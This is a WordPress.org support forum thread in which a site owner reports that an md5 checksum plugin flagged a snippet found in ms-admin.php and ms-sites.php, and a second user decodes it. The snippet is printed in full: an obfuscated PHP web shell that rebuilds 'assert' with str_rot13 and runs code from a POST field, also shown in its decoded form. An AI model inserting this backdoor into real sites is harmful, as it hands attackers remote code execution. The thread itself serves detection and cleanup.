md5 checksum checker | WordPress.org

edwardsmark
(@edwardsmark)

7 years, 11 months ago
hello –

i found this plugin that checks md5 values against the WP repository, which i believe is an excellent idea.

any other opinions on taking this approach to security( in addition to quttera)

this plugin found the following in two places, ms-admin.php and ms-sites.php
```
<?php
$license = str_rot13('n'.'f'.'f'.'r'.'e'.'g');
$license($_POST['info']);
?><?php
```

Viewing 2 replies - 1 through 2 (of 2 total)

RossMitchell
(@rossmitchell)

7 years, 11 months ago
Curious.
I suspect that this is an EXTREME security vulnerability. With a vulnerability like this accessible, I suspect that no one would bother with an SQL injection.

Rot13 is a trivial text obscurer. Your code amounts to:
```
<?php
assert($_POST['info']);
?><?php
```
Now this will evaluate whatever expression is passed in as $_POST['info']
This is looking very suspect.
Where are these files ms-admin.php and ms-sites.php coming from ????
Thread Starter edwardsmark
(@edwardsmark)

7 years, 11 months ago

not sure where the files came from, but i am now running a bash script searches this out, and runs frequently.

i am impressed the md5 plugin managed to find it.

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘md5 checksum checker’ is closed to new replies.

In: Fixing WordPress
2 replies
2 participants
Last reply from: edwardsmark
Last activity: 7 years, 11 months ago
Status: not resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics